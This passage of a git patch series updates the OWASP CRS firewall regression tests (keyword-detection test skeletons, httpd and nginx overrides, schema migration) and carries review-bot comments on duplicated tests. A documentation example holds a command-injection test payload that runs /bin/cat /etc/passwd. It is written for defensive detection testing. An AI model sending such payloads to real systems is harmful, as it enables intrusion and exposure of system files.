"skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "<?xml version=\"1.0\"?><xml><skeletonkeyword attribute_name=\"attribute_value\">value</skeletonkeyword></xml>" - output: - no_log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "<?xml version=\"1.0\"?><xml><skeletonkeyword attribute_name=\"attribute_value\">value</skeletonkeyword></xml>" + output: + no_log_contains: "id \"skeletonid\"" - - - test_title: skeletonid-skeletontest + - test_id: 7 desc: "XML attribute name includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "<?xml version=\"1.0\"?><xml><element skeletonkeyword=\"attribute_value\">element_value</element></xml>" - output: - no_log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: 
"skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "<?xml version=\"1.0\"?><xml><element skeletonkeyword=\"attribute_value\">element_value</element></xml>" + output: + no_log_contains: "id \"skeletonid\"" - - - test_title: skeletonid-skeletontest + - test_id: 8 desc: "XML attribute value includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"skeletonkeyword\">element_value</element></xml>" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"skeletonkeyword\">element_value</element></xml>" + output: + log_contains: "id \"skeletonid\"" - - - test_title: skeletonid-skeletontest + - test_id: 9 desc: "XML element value includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: 
"skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">skeletonkeyword</element></xml>" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">skeletonkeyword</element></xml>" + output: + log_contains: "id \"skeletonid\"" - - - test_title: skeletonid-skeletontest + - test_id: 10 desc: "Nested XML element value includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">skeletonkeyword</element></l3></l2></l1></xml>" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: 
"skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">skeletonkeyword</element></l3></l2></l1></xml>" + output: + log_contains: "id \"skeletonid\"" - - - test_title: skeletonid-skeletontest + - test_id: 11 desc: "Content-Type text/plain includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=skeletonkeyword" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=skeletonkeyword" + output: + log_contains: "id \"skeletonid\"" - - - test_title: skeletonid-skeletontest + - test_id: 12 desc: "Content-Type application/json arg value includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: 
"skeletondefaultacceptlanguage" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"skeletonkeyword\"}" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"skeletonkeyword\"}" + output: + log_contains: "id \"skeletonid\"" - - - test_title: skeletonid-skeletontest + - test_id: 13 desc: "Content-Type application/json arg name includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"skeletonkeyword\": \"test\"}" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"skeletonkeyword\": \"test\"}" + output: + log_contains: "id \"skeletonid\"" - - - test_title: skeletonid-skeletontest + - test_id: 14 desc: "Content-Type multipart/form-data json arg name includes keyword 
skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\nContent-Disposition: form-data; name=\"payload\"\nContent-Type: application/json\n\n{\"skeletonkeyword\": \"test\"}\n-----------------------------thisissparta--" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: "-----------------------------thisissparta\nContent-Disposition: form-data; name=\"payload\"\nContent-Type: application/json\n\n{\"skeletonkeyword\": \"test\"}\n-----------------------------thisissparta--" + output: + log_contains: "id \"skeletonid\"" - - - test_title: skeletonid-skeletontest + - test_id: 15 desc: "Content-Type multipart/form-data json arg value includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" 
- Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\nContent-Disposition: form-data; name=\"payload\"\nContent-Type: application/json\n\n{\"skeletonkeyword\": \"test\"}\n-----------------------------thisissparta--" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: "-----------------------------thisissparta\nContent-Disposition: form-data; name=\"payload\"\nContent-Type: application/json\n\n{\"skeletonkeyword\": \"test\"}\n-----------------------------thisissparta--" + output: + log_contains: "id \"skeletonid\"" - - - test_title: skeletonid-skeletontest + - test_id: 16 desc: "Content-Type multipart/form-data XML element value includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\nContent-Disposition: form-data; name=\"payload\"\nContent-Type: application/xml\n\n<?xml version=\"1.0\"?><xml><element 
attribute_name=\"attribute_value\">skeletonkeyword</element></xml>\n-----------------------------thisissparta--" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: "-----------------------------thisissparta\nContent-Disposition: form-data; name=\"payload\"\nContent-Type: application/xml\n\n<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">skeletonkeyword</element></xml>\n-----------------------------thisissparta--" + output: + log_contains: "id \"skeletonid\"" - - - test_title: skeletonid-skeletontest + - test_id: 17 desc: "Content-Type multipart/form-data XML element value includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\nContent-Disposition: form-data; name=\"payload\"\nContent-Type: application/xml\n\n<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">skeletonkeyword</element></xml>\n-----------------------------thisissparta--" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport 
+ headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: "-----------------------------thisissparta\nContent-Disposition: form-data; name=\"payload\"\nContent-Type: application/xml\n\n<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">skeletonkeyword</element></xml>\n-----------------------------thisissparta--" + output: + log_contains: "id \"skeletonid\"" From adb552589c01e60438854a7ddb124f664fe8a114 Mon Sep 17 00:00:00 2001 From: Max Leske <maxleske@gmail.com> Date: Sun, 5 May 2024 08:08:21 +0200 Subject: [PATCH 08/18] feat: add platform overrides for httpd --- tests/regression/httpd-overrides.yaml | 12 ++++++++++++ 1 file changed, 12 insertions(+) create mode 100644 tests/regression/httpd-overrides.yaml diff --git a/tests/regression/httpd-overrides.yaml b/tests/regression/httpd-overrides.yaml new file mode 100644 index 000000000..8f42ffa6e --- /dev/null +++ b/tests/regression/httpd-overrides.yaml @@ -0,0 +1,12 @@ +version: "v0.0.0" +meta: + engine: "ModSecurity v2" + platform: "httpd" + annotations: + - purpose: "CRS test suite" +test_overrides: + - rule_id: 920390 + test_ids: [1] + reason: 'Exceeds PCRE limits' + output: + expect_error: true From 586ae800963f1b3cad9e1eb06c4539e71b9dde42 Mon Sep 17 00:00:00 2001 
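Review bot: In the rewritten positivetest.yaml.skeleton, test_id 15 is described as "multipart/form-data json arg value includes keyword" but its body is `{\"skeletonkeyword\": \"test\"}`, the same arg-name payload that test_id 14 already sends, so the generated suite never exercises the JSON value position inside a multipart part; the data line should be `data: "-----------------------------thisissparta\nContent-Disposition: form-data; name=\"payload\"\nContent-Type: application/json\n\n{\"test\": \"skeletonkeyword\"}\n-----------------------------thisissparta--"`. Test_ids 16 and 17 are byte-identical (same desc, same XML payload), so one of them should be dropped or changed to cover the attribute-value case, as test_id 8 does for the non-multipart XML body. Both problems were already present on the removed side, so the commit only carries them over, but this skeleton is what every generated positive test file will now be built from, so the gap is worth closing here.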
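Review bot: The single override in the new httpd-overrides.yaml, `reason: 'Exceeds PCRE limits'` for 920390 test 1, gives a reader no way to tell which limit is hit or when the override can be retired; the nginx overrides in this series link a tracking issue for the comparable engine limitation on 934131, and this one should do the same, e.g. `reason: 'Payload exceeds the PCRE match limits configured for ModSecurity v2; see <tracking issue>'`. Because the expectation is `expect_error: true`, a passing run only proves that the engine reported an error, not that 920390 still matches the intended payload on httpd, and stating that explicitly in the reason keeps the detection gap from being forgotten.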
From: Max Leske <250711+theseion@users.noreply.github.com> Date: Fri, 31 May 2024 18:03:36 +0200 Subject: [PATCH 09/18] chore: update tests to newest schema --- CONTRIBUTING.md | 6 +- tests/regression/README.md | 2 +- tests/regression/nginx-overrides.yaml | 17 +- .../911100.yaml | 25 +- .../REQUEST-913-SCANNER-DETECTION/913100.yaml | 21 +- .../920100.yaml | 33 +- .../920120.yaml | 405 +++--- .../920121.yaml | 15 +- .../920160.yaml | 25 +- .../920170.yaml | 43 +- .../920171.yaml | 9 +- .../920180.yaml | 17 +- .../920181.yaml | 6 +- .../920190.yaml | 10 +- .../920200.yaml | 31 +- .../920201.yaml | 6 +- .../920202.yaml | 6 +- .../920210.yaml | 21 +- .../920220.yaml | 40 +- .../920221.yaml | 10 +- .../920230.yaml | 7 +- .../920240.yaml | 25 +- .../920250.yaml | 13 +- .../920260.yaml | 20 +- .../920270.yaml | 37 +- .../920271.yaml | 19 +- .../920272.yaml | 16 +- .../920273.yaml | 16 +- .../920274.yaml | 39 +- .../920275.yaml | 18 +- .../920280.yaml | 7 +- .../920290.yaml | 10 +- .../920300.yaml | 12 +- .../920310.yaml | 19 +- .../920311.yaml | 10 +- .../920320.yaml | 7 +- .../920330.yaml | 7 +- .../920340.yaml | 11 +- .../920341.yaml | 11 +- .../920350.yaml | 25 +- .../920360.yaml | 3 +- .../920370.yaml | 3 +- .../920380.yaml | 3 +- .../920390.yaml | 5 +- .../920400.yaml | 6 +- .../920410.yaml | 6 +- .../920420.yaml | 52 +- .../920430.yaml | 13 +- .../920440.yaml | 18 +- .../920450.yaml | 22 +- .../920451.yaml | 6 +- .../920460.yaml | 18 +- .../920470.yaml | 54 +- .../920480.yaml | 90 +- .../920490.yaml | 9 +- .../920500.yaml | 9 +- .../920510.yaml | 18 +- .../920520.yaml | 27 +- .../920521.yaml | 21 +- .../920530.yaml | 12 +- .../920540.yaml | 9 +- .../920600.yaml | 45 +- .../920610.yaml | 31 +- .../920620.yaml | 10 +- .../REQUEST-921-PROTOCOL-ATTACK/921110.yaml | 33 +- .../REQUEST-921-PROTOCOL-ATTACK/921120.yaml | 12 +- .../REQUEST-921-PROTOCOL-ATTACK/921130.yaml | 12 +- .../REQUEST-921-PROTOCOL-ATTACK/921140.yaml | 6 +- .../REQUEST-921-PROTOCOL-ATTACK/921150.yaml | 6 
+- .../REQUEST-921-PROTOCOL-ATTACK/921151.yaml | 12 +- .../REQUEST-921-PROTOCOL-ATTACK/921160.yaml | 18 +- .../REQUEST-921-PROTOCOL-ATTACK/921180.yaml | 18 +- .../REQUEST-921-PROTOCOL-ATTACK/921190.yaml | 12 +- .../REQUEST-921-PROTOCOL-ATTACK/921200.yaml | 30 +- .../REQUEST-921-PROTOCOL-ATTACK/921210.yaml | 9 +- .../REQUEST-921-PROTOCOL-ATTACK/921220.yaml | 3 +- .../REQUEST-921-PROTOCOL-ATTACK/921230.yaml | 3 +- .../REQUEST-921-PROTOCOL-ATTACK/921240.yaml | 6 +- .../REQUEST-921-PROTOCOL-ATTACK/921421.yaml | 36 +- .../REQUEST-921-PROTOCOL-ATTACK/921422.yaml | 51 +- .../REQUEST-922-MULTIPART-ATTACK/922100.yaml | 9 +- .../REQUEST-922-MULTIPART-ATTACK/922110.yaml | 6 +- .../REQUEST-922-MULTIPART-ATTACK/922120.yaml | 6 +- .../930100.yaml | 12 +- .../930110.yaml | 36 +- .../930120.yaml | 30 +- .../930121.yaml | 30 +- .../930130.yaml | 6 +- .../931100.yaml | 3 +- .../931110.yaml | 9 +- .../931120.yaml | 24 +- .../931130.yaml | 66 +- .../931131.yaml | 3 +- .../932120.yaml | 15 +- .../932125.yaml | 9 +- .../932130.yaml | 48 +- .../932131.yaml | 6 +- .../932140.yaml | 474 ++++--- .../932160.yaml | 42 +- .../932161.yaml | 36 +- .../932170.yaml | 3 +- .../932171.yaml | 6 +- .../932175.yaml | 45 +- .../932180.yaml | 9 +- .../932190.yaml | 18 +- .../932200.yaml | 45 +- .../932205.yaml | 21 +- .../932206.yaml | 9 +- .../932210.yaml | 21 +- .../932220.yaml | 42 +- .../932230.yaml | 171 ++- .../932231.yaml | 3 +- .../932232.yaml | 21 +- .../932235.yaml | 114 +- .../932236.yaml | 240 ++-- .../932237.yaml | 102 +- .../932238.yaml | 30 +- .../932239.yaml | 159 ++- .../932240.yaml | 57 +- .../932250.yaml | 68 +- .../932260.yaml | 135 +- .../932300.yaml | 27 +- .../932301.yaml | 21 +- .../932310.yaml | 24 +- .../932311.yaml | 39 +- .../932320.yaml | 33 +- .../932321.yaml | 18 +- .../932330.yaml | 3 +- .../932331.yaml | 6 +- .../932370.yaml | 12 +- .../932380.yaml | 27 +- .../933100.yaml | 24 +- .../933110.yaml | 90 +- .../933111.yaml | 3 +- .../933120.yaml | 24 +- .../933130.yaml | 18 
+- .../933131.yaml | 9 +- .../933140.yaml | 3 +- .../933150.yaml | 99 +- .../933151.yaml | 24 +- .../933160.yaml | 111 +- .../933161.yaml | 40 +- .../933170.yaml | 30 +- .../933180.yaml | 108 +- .../933190.yaml | 3 +- .../933200.yaml | 30 +- .../933210.yaml | 63 +- .../933211.yaml | 63 +- .../934100.yaml | 99 +- .../934101.yaml | 30 +- .../934110.yaml | 24 +- .../934120.yaml | 148 +- .../934130.yaml | 39 +- .../934140.yaml | 3 +- .../934150.yaml | 3 +- .../934160.yaml | 99 +- .../934170.yaml | 9 +- .../941100.yaml | 18 +- .../941101.yaml | 9 +- .../941110.yaml | 30 +- .../941120.yaml | 18 +- .../941130.yaml | 57 +- .../941140.yaml | 12 +- .../941150.yaml | 6 +- .../941160.yaml | 48 +- .../941170.yaml | 15 +- .../941180.yaml | 21 +- .../941181.yaml | 12 +- .../941190.yaml | 15 +- .../941200.yaml | 12 +- .../941210.yaml | 15 +- .../941220.yaml | 6 +- .../941230.yaml | 6 +- .../941240.yaml | 6 +- .../941250.yaml | 6 +- .../941260.yaml | 6 +- .../941270.yaml | 6 +- .../941280.yaml | 8 +- .../941290.yaml | 6 +- .../941300.yaml | 6 +- .../941310.yaml | 36 +- .../941320.yaml | 3 +- .../941330.yaml | 6 +- .../941340.yaml | 6 +- .../941350.yaml | 3 +- .../941360.yaml | 9 +- .../941370.yaml | 30 +- .../941380.yaml | 3 +- .../941390.yaml | 27 +- .../941400.yaml | 21 +- .../942100.yaml | 42 +- .../942101.yaml | 33 +- .../942120.yaml | 118 +- .../942130.yaml | 30 +- .../942131.yaml | 21 +- .../942140.yaml | 51 +- .../942150.yaml | 57 +- .../942151.yaml | 33 +- .../942152.yaml | 9 +- .../942160.yaml | 30 +- .../942170.yaml | 12 +- .../942180.yaml | 24 +- .../942190.yaml | 138 +- .../942200.yaml | 6 +- .../942210.yaml | 243 ++-- .../942220.yaml | 6 +- .../942230.yaml | 36 +- .../942240.yaml | 33 +- .../942250.yaml | 3 +- .../942251.yaml | 6 +- .../942260.yaml | 3 +- .../942270.yaml | 6 +- .../942280.yaml | 6 +- .../942290.yaml | 27 +- .../942300.yaml | 9 +- .../942310.yaml | 9 +- .../942320.yaml | 39 +- .../942321.yaml | 6 +- .../942330.yaml | 15 +- .../942340.yaml | 33 +- 
.../942350.yaml | 12 +- .../942360.yaml | 117 +- .../942361.yaml | 21 +- .../942362.yaml | 96 +- .../942370.yaml | 33 +- .../942380.yaml | 135 +- .../942390.yaml | 3 +- .../942400.yaml | 6 +- .../942410.yaml | 354 +++-- .../942420.yaml | 3 +- .../942421.yaml | 3 +- .../942430.yaml | 3 +- .../942431.yaml | 3 +- .../942432.yaml | 3 +- .../942440.yaml | 60 +- .../942450.yaml | 15 +- .../942460.yaml | 6 +- .../942470.yaml | 33 +- .../942480.yaml | 39 +- .../942490.yaml | 66 +- .../942500.yaml | 15 +- .../942510.yaml | 6 +- .../942511.yaml | 6 +- .../942520.yaml | 69 +- .../942521.yaml | 72 +- .../942522.yaml | 27 +- .../942530.yaml | 3 +- .../942540.yaml | 21 +- .../942550.yaml | 108 +- .../942560.yaml | 6 +- .../943100.yaml | 6 +- .../943110.yaml | 12 +- .../943120.yaml | 3 +- .../944000.yaml | 4 +- .../944100.yaml | 55 +- .../944110.yaml | 55 +- .../944120.yaml | 408 ++++-- .../944130.yaml | 1254 +++++++++++------ .../944140.yaml | 27 +- .../944150.yaml | 73 +- .../944151.yaml | 76 +- .../944152.yaml | 79 +- .../944200.yaml | 4 +- .../944210.yaml | 153 +- .../944240.yaml | 264 ++-- .../944250.yaml | 66 +- .../944260.yaml | 6 +- .../944300.yaml | 990 ++++++++----- .../949110.yaml | 12 +- .../951110.yaml | 3 +- .../951120.yaml | 3 +- .../951130.yaml | 3 +- .../951140.yaml | 3 +- .../951150.yaml | 3 +- .../951160.yaml | 3 +- .../951170.yaml | 3 +- .../951180.yaml | 3 +- .../951190.yaml | 3 +- .../951200.yaml | 3 +- .../951210.yaml | 3 +- .../951220.yaml | 6 +- .../951230.yaml | 6 +- .../951240.yaml | 6 +- .../951250.yaml | 3 +- .../951260.yaml | 3 +- .../953100.yaml | 15 +- .../953101.yaml | 15 +- .../953120.yaml | 21 +- .../954100.yaml | 3 +- .../954120.yaml | 6 +- .../tests/RESPONSE-955-WEB-SHELLS/955100.yaml | 9 +- .../tests/RESPONSE-955-WEB-SHELLS/955260.yaml | 3 +- .../959100.yaml | 6 +- .../RESPONSE-980-CORRELATION/980170.yaml | 11 +- 294 files changed, 7906 insertions(+), 4132 deletions(-) 
diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md index fc0a6aa47..d556c40e4 100644 --- a/CONTRIBUTING.md +++ b/CONTRIBUTING.md @@ -387,7 +387,8 @@ Example of a simple *positive test*: data: "var=` /bin/cat /etc/passwd`" version: HTTP/1.1 output: - log_contains: id "932230" + log: + expect_ids: [932230] ``` This test will succeed if the log output contains `id "932230"`, which would indicate that the rule in question matched and generated an alert. @@ -414,7 +415,8 @@ Example of a simple *negative test*: data: 'foo=ping pong tables' uri: '/post' output: - no_log_contains: id "932260" + log: + no_expect_ids: [932260] ``` This test will succeed if the log output does **not** contain `id "932260"`, which would indicate that the rule in question did **not** match and so did **not** generate an alert. diff --git a/tests/regression/README.md b/tests/regression/README.md index 43f8e83d7..7c8cb0e1e 100644 --- a/tests/regression/README.md +++ b/tests/regression/README.md @@ -16,7 +16,7 @@ The OWASP CRS project was part of the effort to develop the Web Application Fire meta: author: "csanders-git" name: "911100.yaml" - description: "Description" + description: "A meaningful description" rule_id: 911100 tests: - test_id: 1 diff --git a/tests/regression/nginx-overrides.yaml b/tests/regression/nginx-overrides.yaml index 41b04c3b8..cb2cd55c4 100644 --- a/tests/regression/nginx-overrides.yaml +++ b/tests/regression/nginx-overrides.yaml 
@@ -11,23 +11,22 @@ test_overrides: reason: "Nginx returns a 400 bad request" output: status: 400 - expect_error: false - rule_id: 920100 test_ids: [8] reason: "On Apache is not allowed to put a colon in the path. Nginx, on the other hand, allows it and, in this case, returns a 404. /index.html:80?I=Like&Apples=Today#tag" output: status: 404 - expect_error: false - rule_id: 920100 test_ids: [14] reason: "Invalid request line produces a 400 Bad Request on Nginx. This prevents matching any rules." output: - expect_error: true + status: 400 - rule_id: 920100 test_ids: [16] reason: "Seems like Nginx does a normalization of the request line, and if <schema>://<hostname> is sent (without a path) the request path becomes / by default" output: - expect_error: true + log: + no_expect_ids: [920100] - rule_id: 920181 test_ids: [1] reason: "Nginx returns 400 if both Content-length and Transfer-Encoding chunked are present" @@ -37,7 +36,6 @@ test_overrides: test_ids: [4] reason: "Header host with null byte causes Apache to error before it gets to CRS. Nginx allow this and libModSecurity correctly matches the rule" output: - expect_error: false status: 200 log: expect_ids: [920270] 
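Review bot: The 920100 test 14 override now asserts only `status: 400`, although its reason states that the invalid request line prevents any rule from matching; adding `log:` / `no_expect_ids: [920100]` under the status, as the test 16 override in the same hunk does, would turn that stated behaviour into a checked one and catch a regression where nginx starts passing such a request through to CRS. The `rule_id: 920100` / `test_ids: [4]` entry that this hunk opens in begins outside the hunk.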
